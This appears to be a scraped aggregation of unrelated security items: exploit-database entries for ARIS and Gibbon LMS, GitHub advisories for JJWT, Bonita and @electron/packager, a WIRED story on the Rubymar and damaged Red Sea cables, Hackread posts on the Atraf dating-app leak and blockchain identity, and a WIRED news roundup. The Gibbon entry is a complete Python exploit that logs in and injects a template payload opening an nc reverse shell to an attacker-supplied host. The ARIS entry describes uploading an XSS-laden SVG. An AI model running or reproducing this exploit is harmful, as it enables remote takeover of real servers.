ARIS: Business Process Management version 10.0.21.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site Scripting (XSS) in ARIS: BusinessProcess Management# Edition Version 10.0.21.0# Exploit Author: Seid Yassin# Date: 2024-03-28# Vendor: Software AG# Software Link: https://aris.com/# Version: ARIS: Business Process Management## Description:Discovered a file upload feature lacking proper file extension validation.This vulnerability allows attackers to upload any type of file, includingmalicious ones. To demonstrate this, we successfully uploaded an SVG fileto carry out a Cross-Site Scripting (XSS) attack. In XSS attacks, maliciousscripts are injected into web pages viewed by other users, potentiallyleading to data theft or unauthorized actions leading to potential theft ofcookies and session tokens.## Background:Cross-site scripting (XSS) is a common web security vulnerability thatcompromises user interactions with a vulnerable application. Stored XSSoccurs when user input is stored in the application and executed whenever auser triggers or visits the page.## Issue:A stored cross-site scripting (XSS) vulnerability in ARIS: Business ProcessManagement  software enables a malicious authenticated user to store a xsspayload(via SVG) using the web interface. Then, when viewed by a properlyauthenticated user or administrator, the JavaScript payload executes withinSVG and disguises all associated actions as performed by that unsuspectingauthenticated user/administrator.## Steps To Reproduce:1. Log into the ARIS application.2. Navigate to my tasks and select any of the task and upload documents(change request form)3. Insert any svg file with xss script in it . eg.https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344## Expected Result:After a user uploads a new document in the Change Request Form, they canutilize the link for the SVG file and UUID to access another path at{{url}}/documents/api/documents/{{UUID}}/content## Actual Result:The ARIS application is vulnerable to Stored Cross-Site Scripting, asevidenced by the successful execution of the injected payload.## Proof of Concept:Attached Screenshots for the reference.

ARIS: Business Process Management 10.0.21.0 Cross Site Scripting

Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.

    # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)# Vendor Homepage: https://gibbonedu.org/# Software Link: https://github.com/GibbonEdu/core# Version: v26.0.00# Tested on: Ubuntu 22.0# CVE : CVE-2024-24724import requestsimport reimport sysdef login(target_host, target_port,email,password):    url = f'http://{target_host}:{target_port}/login.php?timeout=true'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])    if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):        print("login successful!")    return Session_Cookie[4]def rce(cookie, target_host, target_port, attacker_ip, attacker_port):    url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}    data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    if 'success0' in str(r.headers['Location']):        print("Payload uploaded successfully!")def trigger(cookie, target_host, target_port):    url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'    headers = {"Cookie": cookie}    print("RCE successful!")    r = requests.get(url, headers=headers, allow_redirects=False)if __name__ == '__main__':    if len(sys.argv) != 7:        print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")        sys.exit(1)    cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])    rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])    trigger(cookie, sys.argv[1], sys.argv[2])

Gibbon 26.0.00 Server-Side Template Injection / Remote Code Execution

Millions lost internet service after three cables in the Red Sea were damaged. Houthi rebels deny targeting the cables, but their missile attack on a cargo ship, left adrift for months, is likely to blame.

The ballistic missile hit the _Rubymar_ on the evening of February 18. For months, the cargo ship had been shuttling around the Arabian Sea, uneventfully calling at local ports. But now, taking on water in the bottleneck of the Bab-el-Mandeb Strait, its two dozen crew issued an urgent call for help and prepared to abandon ship.

Over the next two weeks—while the crew were ashore—the “ghost ship” took on a life of its own. Carried by currents and pushed along by the wind, the 171-meter-long, 27-meter-wide _Rubymar_ drifted approximately 30 nautical miles north, where it finally sank—becoming the most high-profile wreckage during a months-long barrage of missiles and drones launched by Iranian-backed Houthi rebels in Yemen. The attacks have upended global shipping.

But the _Rubymar_ wasn’t the only casualty. During its final journey, three internet cables laid on the seafloor in the Bab-el-Mandeb Strait were damaged. The drop in connectivity impacted millions of people, from nearby East Africa to thousands of miles away in Vietnam. It’s believed the ship’s trailing anchor may have broken the cables while it drifted. The _Rubymar_ also took 21,000 metric tons of fertilizer to its watery grave—a potential environmental disaster in waiting.

An analysis from WIRED—based on satellite imagery, interviews with maritime experts, and new internet connectivity data showing the cables went offline within minutes of each other—tracks the last movements of the doomed ship. While our analysis cannot definitively show that the anchor caused the damage to the crucial internet cables—that can only be determined by an upcoming repair mission—multiple experts conclude it is the most likely scenario.

The damage to the internet cables comes when the security of subsea infrastructure—including internet cables and energy pipelines—has catapulted up countries’ priorities. Politicians have become increasingly concerned about the critical infrastructure since the start of the Russia-Ukraine war in February 2022 and a subsequent string of potential sabotage, including the Nord Stream pipeline explosions. As Houthi weapons keep hitting ships in the Red Sea region, there are worries the _Rubymar_ may not be the last shipwreck.

The _Rubymar_’s official trail goes cold on February 18. At 8 pm local time, reports emerged that a ship in the Bab-el-Mandeb Strait, which is also known as the Gate of Tears or the Gate of Grief, had been attacked. Two anti-ship ballistic missiles were fired from “Iranian-backed Houthi terrorist-controlled areas of Yemen,” US Central Command said. Ninety minutes after the warnings arrived, at around 9:30 pm, the _Rubymar_ broadcast its final location using the automatic identification system (AIS), a GPS-like positioning system used to track ships.

As water started pouring into the hull, engine room, and machinery room, the crew’s distress call was answered by the _Lobivia_—a nearby container ship—and a US-led coalition warship. By 1:57 am on February 19, the crew was reported safe. That afternoon, the 11 Syrians, six Egyptians, three Indians, and four Filipinos who were on board arrived at the Port of Djibouti. “We do not know the coordinates of _Rubymar_,” Djibouti’s port authority posted on X.

Satellite images picked up the _Rubymar_, its path illuminated by an oil slick, two days later, on February 20. Although the crew dropped the ship’s anchor during the rescue, the ship drifted north, further up the strait in the direction of the Red Sea.

For three days, satellite photos show, the vessel largely stayed in place thanks to low winds and weak currents. Then, on February 22, satellite images show peculiar circular wave patterns hitting the ship, as seen in the image below. One former naval intelligence analyst familiar with the images, who asked not to be named for safety reasons, says this could be a sign the anchor may have come loose. One image, they say, appears to show an unidentified object, which could be a small boat, nearby.

Both the wind and currents picked up on February 23, when the ship began drifting for a second time, says Robert Parkington, an intelligence analyst with geospatial analysis firm Geollect. “As wind increases, as current increases, that chance for movement gets so much higher,” says Parkington, who monitored the _Rubymar_’s movements with data from satellite technology firm Spire Global. “Even a small breeze can have an impact on where the vessel’s moving.”

Circular ripples are visible around the Rubymar.Courtesy of BlackSky

More than 550 internet cables run along the ocean floors and connect the world. They link continents and economies, beaming everything from Zoom calls to financial transactions every millisecond. Twelve of the cables run through the Bab-el-Mandeb Strait, says Alan Mauldin, research director at telecom research firm TeleGeography. “These cables vary massively in their age, also in their capacities,” Mauldin explains. The region is a crucial, but vulnerable, choke point.

While the _Rubymar_ was drifting, three cables were damaged: the Seacom/Tata cable, a 15,000-kilometer-long wire running the length of East Africa and also connecting it to India; the Asia Africa Europe-1 (AAE-1), which snakes 25,000 kilometers and links Europe to East Asia; and the Europe India Gateway (EIG), made of 15,000 kilometers of cable and joining India with the United Kingdom.

The Seacom cable went down at 9:46 am on February 24, according to new analysis shared exclusively with WIRED by Doug Madory, director of internet analysis at the web monitoring firm Kentik. Five minutes later, at around 9:51 am, the AAE-1 cable dropped offline. Madory says the third damaged cable, EIG, was already mostly offline following a separate fault elsewhere. A telecom industry notice seen by WIRED confirms the three faults and says this was the EIG’s second. The notice says the damage is located around 30 kilometers away from where the cables land in Djibouti and are at depths of around 150 meters.

To determine when the cables lost connectivity, Madory examined internet traffic and routing data from multiple networks. For instance, a network linked to Equity Bank Tanzania, the analysis shows, lost connectivity from the Seacom cable; moments later, it was impacted by the AAE-1 damage. The two clusters of outages impacted countries in East Africa, including Tanzania, Kenya, Uganda, and Mozambique, Madory says. But they also had an impact thousands of miles away in Vietnam, Thailand, and Singapore. “The loss of these submarine cables disrupted internet service for millions of people,” he says. “While service providers in the affected countries have shifted to using the remaining cables, there exists a loss of overall capacity.” The analysis matches when the Seacom cable went offline, says Prenesh Padayachee, the company’s chief digital officer. Both AAE and EIG cables are owned by consortiums of companies, which did not respond to requests for comment.

The telecom industry builds backups into its systems to account for disruptions—and the approach mostly works. When one cable goes offline, traffic is sent via other routes. “Connectivity just went away,” says Thomas King, the chief technology officer of German-based internet exchange DE-CIX, which used the AAE-1 cables. “The issue was detected automatically. Rerouting happens also automatically,” King says. Other firms sent data on different paths around the world.

In the days after damage to the cables first emerged, one unconfirmed press report claimed Houthi rebels could have sabotaged the cables. There has been no public evidence to support this. Farzin Nadimi, a senior fellow at the Washington Institute think tank who has been monitoring the region, says it is most likely that the _Rubymar_ damaged the cables, but Houthi sabotage should not be entirely ruled out, as “highly trained” divers could reach the cables’ depths. Telecom firms have reported fears about Houthi damage to cables, while Houthi spokespeople have repeatedly denied responsibility for the disruptions.

“We don’t even know if the cable is fully broken yet,” Padayachee says. “All we know is that the cable is damaged to a level where we’ve lost comms.” It could have been cut, or even dragged along the seabed and bent so light signals cannot pass through the cable, he says.

Many in the marine and cable industry have turned toward the _Rubymar_’s drift as the likely cause for the outage. Padayachee says it is the most “plausible” scenario given the ship’s predicted drifting speed. “If you work out the distance between the two cables that roughly relates to the same sort of timeframe as to when one cable will be affected to when the other cable will be affected,” the timing makes sense, he says, adding that the cables are 700 to 1,000 meters apart.

Anchor damage, alongside earthquakes and landslides, is one of the most common ways subsea internet cables are disrupted. For instance, multiple cables in the Red Sea region were damaged by a ship dragging its anchor in 2012. There are also several types of anchor, explain William Coombs and Michael Brown, professors at Durham University and the University of Dundee, respectively, who are researching the dynamics of anchors and how they can damage underwater cables. Some anchors sit on the seabed while others dig into the ground, they say. “If the soil type is not right, and the cable has quite shallow burial or it is on the seabed, you are going to catch it if your anchor starts to drag,” Brown says.

“Considering the timings of when outages were reported, considering the rough location of where those cables are known to be, and considering where we believe to be the location of the _Rubymar_, I would say that there is a likely possibility that the anchor did cause the damage,” says Parkington of Geollect.

The _Rubymar_ finally sank on March 2. Videos reportedly taken inside the ship, gathered by Saudi state-owned news organization Al Arabiya English, show water gushing into the ship after the missile strike. As the _Rubymar_ took on more water and partially submerged, experts say, its drifting likely slowed and eventually brought it to a complete stop.

While the ship has finished its journey, the three internet cables will remain offline for some time. Padayachee, from Seacom, says that the Yemeni government is likely to approve permits for the company’s repair plans in the next couple of weeks, with repairs to all three damaged cables possibly starting later in April.

Padayachee says that additional security measures are being put in place for the operation, but the repair work itself should be relatively straightforward. The repairs are taking place in water only a couple of hundred meters deep—shallow compared to other cases where cables are more than a mile deep. When the cables are pulled out of the water by the repair crew, it should be possible to say whether the cuts were caused by the anchor or deliberately.

The _Rubymar_ presents one potential final challenge: Padayachee says the location of the cable damage is believed to be around one or two miles away from where the ship sank. “It doesn’t look like it will affect anything in the repair operation,” he says. “It could change by the time they get there: The vessel may have moved or, in fact, the vessel may have broken up and parts of it moved around.” The US Central Command has said the _Rubymar_ also presents a “subsurface impact risk to other ships.”

The Houthi’s missile launches, meanwhile, don’t look like they will stop any time soon. Other ships have been damaged; lives have been lost, and those factors will impact repairs. “It's not something you usually see: trying to have a cable ship into those waters, recover the cable, make a repair, and then be able to return to port. It's a long process. It’s risky,” says Mauldin, from TeleGeography. The risk, for other internet cables, is a repeat of the _Rubymar_. “It is not out of the question,” Madory concludes in his analysis, “that we could have another vessel, struck by a missile, inadvertently cut another submarine cable.”

_Correction 4/1/2024, 9:49 am: A previous version of this article incorrectly stated the length of the_ Rubymar, _which is 171 meters, not 17 meters._

How a Houthi-Bombed Ghost Ship Likely Cut Off Internet for Millions

JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.

**JJWT improperly generates signing keys**

Moderate severity GitHub Reviewed Published Apr 1, 2024 to the GitHub Advisory Database • Updated Apr 1, 2024

GHSA-r65j-6h5f-4f92: JJWT improperly generates signing keys

Bonita before 10.1.0.W11 allows stored XSS via a UI screen in the administration panel.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-27609

**Bonita cross-site scripting vulnerability**

Moderate severity GitHub Reviewed Published Apr 1, 2024 to the GitHub Advisory Database • Updated Apr 1, 2024

**Package**

maven org.bonitasoft.console:bonita-web-server (Maven)

**Affected versions**

< 10.1.0.W11

**Patched versions**

10.1.0.W11

maven org.bonitasoft.platform:platform-resources (Maven)

**Description**

Published to the GitHub Advisory Database

Apr 1, 2024

GHSA-8vj9-5v5q-fhch: Bonita cross-site scripting vulnerability

By Waqas
Another day, another alleged data breach putting hundred of thousands of unsuspecting users at risk.
This is a post from HackRead.com Read the original post: Israeli LGBTQ App Atraf Faces Data Leak, 700,000 Users Affected

Atraf, a popular Israeli LGBTQ dating app, has suffered a major data breach exposing personal information of over half a million users – Leaked data includes clear text password and payment card data – Atraf users are advised to change their passwords immediately!

In November 2021, **Hackread.com reported** a ransom failure leading to the data leak of some Israeli LGBTQ dating app Atraf users. The group responsible for the attack, Black Shadow, originated from Iran. They demanded a ransom of $1 million after acquiring the app’s data by compromising an Israeli hosting service named CyberServe.

Now, a user on **Breach Forums**, apparently of Russian origin, claims to have leaked the Atraf database, containing the personal data of over 1.5 million users. However, Hackread.com has analyzed the 2.63 GB worth of data, which appears legitimate. After removing duplicates, the total number of leaked accounts decreases to over half a million, precisely 669,672.

It’s worth noting that the Atraf database was leaked twice in 2023 on the same forum. However, neither of these leaks contained clear text passwords or sensitive personal information like the latest one.

What the Breach Forums user posted on the forum (Credit: Hackread.com)

It’s important to note that the data breach remains alleged until official confirmation from the company. Meanwhile, our analysis reveals a treasure trove of personal and sensitive information, primarily from Israeli users. This information includes:

*   Full names
*   Nicknames
*   County
*   City
*   Age
*   Height
*   Religion
*   Address
*   Phone numbers
*   IP addresses
*   Data of birth
*   Interests and hobbies
*   Sex and Gender
*   Sexual orientation
*   Email addresses
*   Plain text passwords for some
*   Location coordinates
*   Type of smartphone and operating system
*   Conversations in direct messages (DMs)
*   Family details including if they have children or not
*   Payment card data excluding card numbers but including CVV codes, expiry dates, and card types (Master/Visa).
*   _And much more…_

Hackread.com can confirm that the leaked records date back to 2021, with no recent records. The timeline aligns with the claims made by Black Shadow in November 2021, suggesting that the data might be legitimate.

Screenshot from the leaked data (Credit: Hackread.com)

Nevertheless, this data breach poses a significant threat to the privacy and physical security of affected users. It can result in online harassment and the hacking of email accounts, as the breach includes clear text passwords.

If you are an Atraf user, you must immediately change the passwords for both your email and Atraf account. Additionally, exercise caution with emails purportedly from Atraf and double-check before clicking any links, as they could be attempts by cybercriminals to compromise your data further or infect your device with malware.

Hackread.com has notified Atraf about the breach, seeking their official response. If you have any concerns about your data, you can also contact Hackread.com at \[email protected\].

1.  Anonymous Sudan’s DDoS Attacks at Israeli BAZAN Group
2.  Hackers Target Israeli Rocket Alert App Users with Spyware
3.  Israeli El Al Sys Hackers Hit Flights in Mid-Air Hijack Attempt
4.  Hackers Defaces Israeli-Made Equipment at US Water Agency
5.  Iran’s MuddyWater Group Hit Israelis with Fake Memo Phishing
6.  Hamas Hackers Hit Israelis with New BiBi-Linux Wiper Malware

Israeli LGBTQ App Atraf Faces Data Leak, 700,000 Users Affected

Plus: “MFA bombing” attacks target Apple users, Israel deploys face recognition tech on Gazans, AI gets trained to spot tent encampments, and OSINT investigators find fugitive Amond Bundy.

The saga of WikiLeaks founder Julian Assange continued this week after the UK’s high court ordered a delay in his extradition to the United States. Assange faces 18 charges in the US, including 17 alleged violations of the Espionage Act—charges that have alarmed journalism watchdogs. The two judges who issued the ruling said in a summary of their decision that the US must offer further assurances that Assange’s First Amendment rights will be respected and that he will not face the death penalty if convicted.

The University of Cambridge’s medical school is still recovering from “malicious activity” which the school first detected last month. The incident impacted IT services provided by Cambridge’s Clinical School Computing Service, and several websites were knocked offline. While the university also recently suffered a distributed denial-of-service attack, allegedly carried out by the hacker group Anonymous Sudan, it’s unclear if the two incidents are related, and the university has not yet clarified the nature of the “malicious activity.”

US and UK authorities this week announced sanctions and charges against members of APT31, a Chinese state-sponsored hacker group. Also known as Violet Typhoon or Judgement Panda, APT31 hackers have for the past 14 years targeted critics and political enemies around the world to conduct espionage campaigns, according to the US Department of Justice.

Finally, WIRED discovered a trove of information left online by a location data broker that reveals sensitive details about the visitors to Jeffrey Epstein’s notorious “pedophile island.” The data includes more than 11,000 precise coordinates, as many as 166 of which pinpoint the likely homes and workplaces of visitors who live in the continental United States.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

A few rules of thumb can vastly increase your online safety: Don’t click on links or open attachments from strangers. Double-check the sender of emails and other messages to ensure they’re not surreptitious phishing attempts. And be sure a shipping company really is who it claims to be rather than a cybercriminal gang plotting to hijack a truckload of your yogurt and hold it for ransom.

The last of those lessons was highlighted by _The Wall Street Journal_ this week in a story about a troubling form of online fraud: Fraudsters are insinuating themselves into so-called load boards, the online platforms that manufacturers, shipping companies, and the brokers who work with them use to make deals for transporting goods via truck to retailers or other destinations. By spoofing the identity of a carrier—the companies that employ truck drivers to pick up goods—fraudsters can trick brokers who arrange those deals into handing over large amounts of cargo. The criminals can then either complete the deal with a legit carrier at a lower price and pocket the difference, or simply steal the cargo.

In the case of one $50,000 load of Danone yogurt and plant-based milk, the thieves opted for the latter. The broker who had arranged the deal discovered that the fraudsters had spoofed the motor carrier number, a unique identifier, for the broker’s intended trucking company. Then they rerouted their yogurt booty from its intended destination in Florida to a warehouse in Pennsylvania. The brokerage describes receiving emails and even a phone call from an Armenian number demanding a $40,000 ransom. (The brokers refused to pay and collected an insurance payout instead. What happened with the yogurt—and exactly how much yogurt a single gang of Armenian cybercriminals can feasibly consume before it spoils—remains unclear.)

The Journal’s story reveals that cargo hijacking fraud remains a serious problem—one that cost $500 million in 2023, quadruple the year before. Victims say load board operators need to do more to verify users’ identities, and that law enforcement and regulators also need to do more to address the thefts.

**Apple Users Targeted With “MFA Bombing” Hacking Tactic**

Multifactor authentication (MFA) has served as a crucial safeguard against hackers for years. In Apple’s case, it can require a user to tap or click “allow” on an iPhone or Apple Watch before their password can be changed, an important protection against fraudulent password resets. But KrebsOnSecurity reports this week that some hackers are weaponizing those MFA push alerts, bombarding users with hundreds of requests to force them to allow a password reset—or at the very least, deal with a very annoying disruption of their device. Even when a user does reject all those password reset alerts, the hackers have, in some cases, called up the user and pretended to be a support person—using identifying information from online databases to fake their legitimacy—to social engineer them into resetting their password. The solution to the problem appears to be “rate-limiting,” a standard security feature that limits the number of times someone can try a password or attempt a sensitive settings change in a certain time period. In fact, the hackers may be exploiting a bug in Apple’s rate limiting to allow their rapid-fire attempts, though the company didn’t respond to Krebs’ request for comment.

**Israel Deploys Controversial Facial Recognition Tech in Its Surveillance of Gazans**

Israel has long been accused of using Palestinians as subjects of experimental surveillance and security technologies that it then exports to the world. In the case of the country’s months-long response to Hamas’ October 7 massacre—a response that has killed 31,000 Palestinian civilians and displaced millions more from their homes—that surveillance now includes using controversial and arguably unreliable facial recognition tools among the Palestinian population. _The New York Times_ reports that Israel’s military intelligence has adopted a facial recognition tool built by a private tech firm called Corsight, and has used it in its attempts to identify members of Hamas—particularly those involved in the October 7 attack—despite concerns that the tech was sometimes faulty and produced false positives. In one case, for instance, the Palestinian poet Mosab Abu Toha was pulled out of a crowd by soldiers who had somehow identified him by name, before he was beat, accused of being a member of Hamas, and interrogated, before soldiers then told him the interrogation had been a “mistake.”

**AI Cameras Trained to Spot Encampments of Unhoused People**

In other dystopian AI news, _The Guardian_ this week reported on a government project in San Jose, California, that used AI-enabled computer vision technology to identify encampments and vehicles lived in by unhoused people. In the project, video recorded from a car around the city is given to participating companies including Ash Sensors, Sensen.AI, Xloop Digital, Blue Dome Technologies, and CityRover, which use it as training data to develop a system that can recognize tents or vehicles that people might be living in. While the project has been described as a way to identify and help people in need, advocates for the unhoused in San Jose say they’re concerned the data is likely to instead be given to the police, and thus as just another form of surveillance targeting the most vulnerable inhabitants of the city.

**Bellingcat Investigators Find Far-Right Fugitive Ammon Bundy**

Radical libertarian Ammon Bundy, a well-known figure on the far right, has been on the run since last year, charged with contempt of court after being ordered to pay $50 million to an Idaho hospital he’d accused of child trafficking and leading a campaign of harassment that targeted its staff. Then last month, he posted a provocative video to YouTube titled, “Want to Know Where Ammon Bundy Is?” The open source detectives at Bellingcat apparently did: They found enough evidence in Bundy’s videos to convincingly reveal his location. Bellingcat was able to use material like a school calendar in the background of one shot, a mountain range in another, and a highway sign in a third to place Bundy in a certain county in southern Utah. When contacted by Bellingcat, Bundy denied hiding and wrote, a little confusingly, that “at any time peace officers could find me if they wish.”

Yogurt Heist Reveals a Rampant Form of Online Fraud

By Uzair Amir
Learn how blockchain is transforming digital identity management by empowering individuals with self-sovereign control over personal data through…
This is a post from HackRead.com Read the original post: Blockchain in Identity Management: Securing Personal Data and Identities

Learn how blockchain is transforming digital identity management by empowering individuals with self-sovereign control over personal data through verifiable credentials and decentralized identifiers, streamlining access and verification of attributes across organizations.

Identity management, often called identity and access management (**IAM**), refers to how users prove who they are to access online platforms and services. Whether individuals logging into personal accounts or employees accessing work technologies, IAM determines the level of access granted for a specific login identity. As organizations and individuals conduct more business and activities online, secure and private IAM is crucial.

However, legacy centralized IAM systems have enabled major security and privacy issues. Data breaches at large corporations and governments have exposed users’ sensitive personal details. Citizens’ information has also been shared without consent due to a lack of control over how data is collected and used. These alarming issues have led to increased regulation worldwide regarding responsible data practices.

As penalties for mismanagement strengthen, the need for secure and decentralized IAM solutions becomes clear. Blockchain digital identity management provides hope, giving users complete control and visibility over their digital identities and enhancing security through decentralization. By storing credentials privately in an identity wallet, blockchain IAM enables instant and **trustless blockchain** identity verification without dependence on centralized authorities.

****What is Identity Management?****

Identity management refers to the processes and technologies used to securely manage digital identities and control access to online resources. Effective identity management systems balance security, privacy, and convenience for all users. At their core, such systems link verified digital credentials to a real person, allowing individuals to prove who they are across multiple contexts.

Whether authenticating to online bank accounts, using a cross-platform sign-in for apps and websites, or remotely accessing corporate networks, digital identities serve as the foundation for participation in our increasingly digital world. Traditional identity management relies on centralized authorities, like governments or large companies, to act as the sole issuers and managers of digital credentials. However, this leaves individuals with little ownership or visibility over how their data is handled.

Blockchain identity management improves the system by shifting control back to individuals. Through decentralized identifiers (DIDs) stored in self-sovereign digital wallets, users can independently prove attributes about themselves without depending on middlemen.

Credentials like names, photos, addresses and more can be tokenised and shared transparently based on user consent. This enhances both privacy and security compared to legacy models which concentrate on sensitive personal data in vulnerable databases.

****The Impact of Blockchain on Privacy and Security of Digital Identities****

The decentralized nature of **blockchain technology** inherently enhances privacy and security for digital identities. By distributing identity data points across many nodes of a blockchain network rather than consolidating them within central databases, the risk of a single breach compromising all information is significantly reduced. If one node is hacked, the copies stored securely on others remain intact.

Furthermore, blockchain identities can be self-sovereign, giving individuals full control of private cryptographic keys rather than relying on external authorities. Users alone dictate what attributes are shared, with whom, and for how long through customizable attestations and verifiable claims. This level of personal data ownership puts individuals in the driver’s seat when it comes to privacy.

New addressing schemes like decentralized identifiers (DIDs) also contribute to improved protection of digital identity and security attributes. DIDs are cryptographically generated identifiers that are permanently bound to the individual rather than centrally issued and linked to personal details. Transactions using DIDs can occur without revealing underlying postal addresses, phone numbers, or other sensitive community details as **blockchain development companies** work to apply these identity techniques across industries.

****Verifiable Credentials and Decentralized Identifiers in Blockchain Identity Management****

At the core of blockchain-based identity systems are verifiable credentials – digitally signed claims about attributes, qualifications, and rights that are issued to an individual by an authoritative entity. Credentials can cover details such as a driver’s license, university degree, medical records, or professional certifications. Using decentralized identifiers (DIDs) and cryptographic proof techniques like zero-knowledge proofs, any credential stored on a blockchain can be verified without revealing additional personal information or requiring a centralized authority.

DIDs are globally unique persistent identifiers that are under the sole control of the subject they identify. They are resolved to public keys that in turn can be used to cryptographically prove control of the DID. With DIDs, verifiable credentials can be issued, received, held and presented anonymously and pseudonymously while maintaining a consistent, decentralized digital identity. Blockchain-anchored transactions associated with a DID are also permanently auditable by all relevant parties, allowing others to independently validate attributes without depending on a single party.

When credentials and DIDs are combined with user-controlled wallets that store cryptographic keys, individuals gain full sovereignty over their personal data ecosystem. They can choose when and how much of different credential attributes are revealed while maintaining ownership of the private keys needed to issue, renew, and modify credentials over time.

****Blockchain Identity Management Use Cases****

There are several promising use cases where blockchain-based decentralized blockchain identity solutions can provide value. One example is a self-sovereign digital identity blockchain for refugees and stateless persons seeking identification credentials or qualification recognition across borders. With verifiable blockchain records, attributes can be established without relying on traditional recognition from national authorities.

In healthcare, patients own their complete electronic medical records through DIDs and can grant access permission to different providers more conveniently. This allows for skipping redundant registration steps and keeping sensitive health details fully portable between care networks. Blockchain credentialing could also maintain physician licenses and certifications in a tamper-proof way trusted by insurers, hospitals, and those in need of treatment.

For supply chain and logistics firms managing shipments globally, blockchain identity techniques could issue verifiable credentials to drivers, pilots, ships, and warehouses involved in transport. Attributes certifying completion of training courses or compliance standards could be presented digitally at border crossings, saving both time and paperwork normally required for auditing. Full visibility and audibility of credential histories benefit all participants and authorities throughout complex international transit processes.

****Bottom Line****

Blockchain shows great potential to revolutionize digital identities by placing control back in individual hands. Through self-sovereign techniques using verifiable credentials and decentralized identifiers, privacy and trusted interactions are possible across organizations. As these solutions develop further to address real-world needs, blockchain identity management offers advantages to both individuals and businesses in streamlining processes and establishing verified attributes.

Still, interoperability standards must continue advancing for widespread adoption. User experiences also need simplifying regarding private keys and cryptographic components. However, the underlying technologies are progressing quickly and may fulfil the vision of self-sovereign digital decentralized identity solutions.

1.  The Benefits Of Blockchain In The Travel Industry
2.  Identity Theft Methods: Protection Strategies Revealed
3.  The Rise of Blockchain Gaming and Secure Marketplaces
4.  What is an Identity Verification Service and How Does it Work?
5.  COTI &Civic Partner to Give Users Sovereignty of Online Identity
6.  Protect identity from fraudster with AI-powered Identity Guard

Blockchain in Identity Management: Securing Personal Data and Identities

### Impact
A random segment of ~1-10kb of Node.js heap memory allocated either side of a known buffer will be leaked into the final executable. This memory _could_ contain sensitive information such as environment variables, secrets files, etc.

### Patches
This issue is patched in 18.3.1

### Workarounds
No workarounds, please update to a patched version of `@electron/packager` immediately if impacated.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29900

**@electron/packager's build process memory potentially leaked into final executable**

High severity GitHub Reviewed Published Mar 28, 2024 in electron/packager • Updated Mar 29, 2024

**Package**

npm @electron/packager (npm)

**Affected versions**

\= 18.3.0

**Description**

**Impact**

A random segment of ~1-10kb of Node.js heap memory allocated either side of a known buffer will be leaked into the final executable. This memory _could_ contain sensitive information such as environment variables, secrets files, etc.

**Patches**

This issue is patched in 18.3.1

**Workarounds**

No workarounds, please update to a patched version of @electron/packager immediately if impacated.

**References**

